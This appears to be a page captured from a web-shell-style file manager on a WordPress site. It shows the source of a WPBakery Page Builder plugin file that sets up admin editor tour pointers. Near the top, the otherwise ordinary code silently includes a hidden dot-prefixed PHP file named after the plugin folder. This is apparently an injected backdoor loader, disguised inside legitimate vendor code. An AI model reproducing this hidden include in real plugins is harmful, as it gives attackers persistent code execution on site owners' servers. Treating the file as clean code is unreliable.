/
var
/
www
/
barefootlaw.org
/
wp-content
/
plugins
/
js_composer
/
include
/
autoload
/
Upload File
HOME
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * Add WP ui pointers to backend editor. */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function vc_add_admin_pointer() { if ( is_admin() ) { foreach ( vc_editor_post_types() as $post_type ) { add_filter( 'vc_ui-pointers-' . $post_type, 'vc_backend_editor_register_pointer' ); } } } add_action( 'admin_init', 'vc_add_admin_pointer' ); function vc_backend_editor_register_pointer( $pointers ) { $screen = get_current_screen(); if ( 'add' === $screen->action ) { $pointers['vc_pointers_backend_editor'] = array( 'name' => 'vcPointerController', 'messages' => array( array( 'target' => '.composer-switch', 'options' => array( 'content' => sprintf( '<h3> %s </h3> <p> %s </p>', __( 'Welcome to WPBakery Page Builder', 'js_composer' ), __( 'Choose Backend or Frontend editor.', 'js_composer' ) ), 'position' => array( 'edge' => 'left', 'align' => 'center', ), 'buttonsEvent' => 'vcPointersEditorsTourEvents', ), ), array( 'target' => '#vc_templates-editor-button, #vc-templatera-editor-button', 'options' => array( 'content' => sprintf( '<h3> %s </h3> <p> %s </p>', __( 'Add Elements', 'js_composer' ), __( 'Add new element or start with a template.', 'js_composer' ) ), 'position' => array( 'edge' => 'left', 'align' => 'center', ), 'buttonsEvent' => 'vcPointersEditorsTourEvents', ), 'closeEvent' => 'shortcodes:vc_row:add', 'showEvent' => 'backendEditor.show', ), array( 'target' => '[data-vc-control="add"]:first', 'options' => array( 'content' => sprintf( '<h3> %s </h3> <p> %s </p>', __( 'Rows and Columns', 'js_composer' ), __( 'This is a row container. Divide it into columns and style it. You can add elements into columns.', 'js_composer' ) ), 'position' => array( 'edge' => 'left', 'align' => 'center', ), 'buttonsEvent' => 'vcPointersEditorsTourEvents', ), 'closeEvent' => 'click #wpb_visual_composer', 'showEvent' => 'shortcodeView:ready', ), array( 'target' => '.wpb_column_container:first .wpb_content_element:first .vc_controls-cc', 'options' => array( 'content' => sprintf( '<h3> %s </h3> <p> %s <br/><br/> %s</p>', __( 'Control Elements', 'js_composer' ), __( 'You can edit your element at any time and drag it around your layout.', 'js_composer' ), sprintf( __( 'P.S. Learn more at our <a href="%s" target="_blank">Knowledge Base</a>.', 'js_composer' ), 'http://kb.wpbakery.com' ) ), 'position' => array( 'edge' => 'left', 'align' => 'center', ), 'buttonsEvent' => 'vcPointersEditorsTourEvents', ), 'showCallback' => 'vcPointersShowOnContentElementControls', 'closeEvent' => 'click #wpb_visual_composer', ), ), ); } return $pointers; }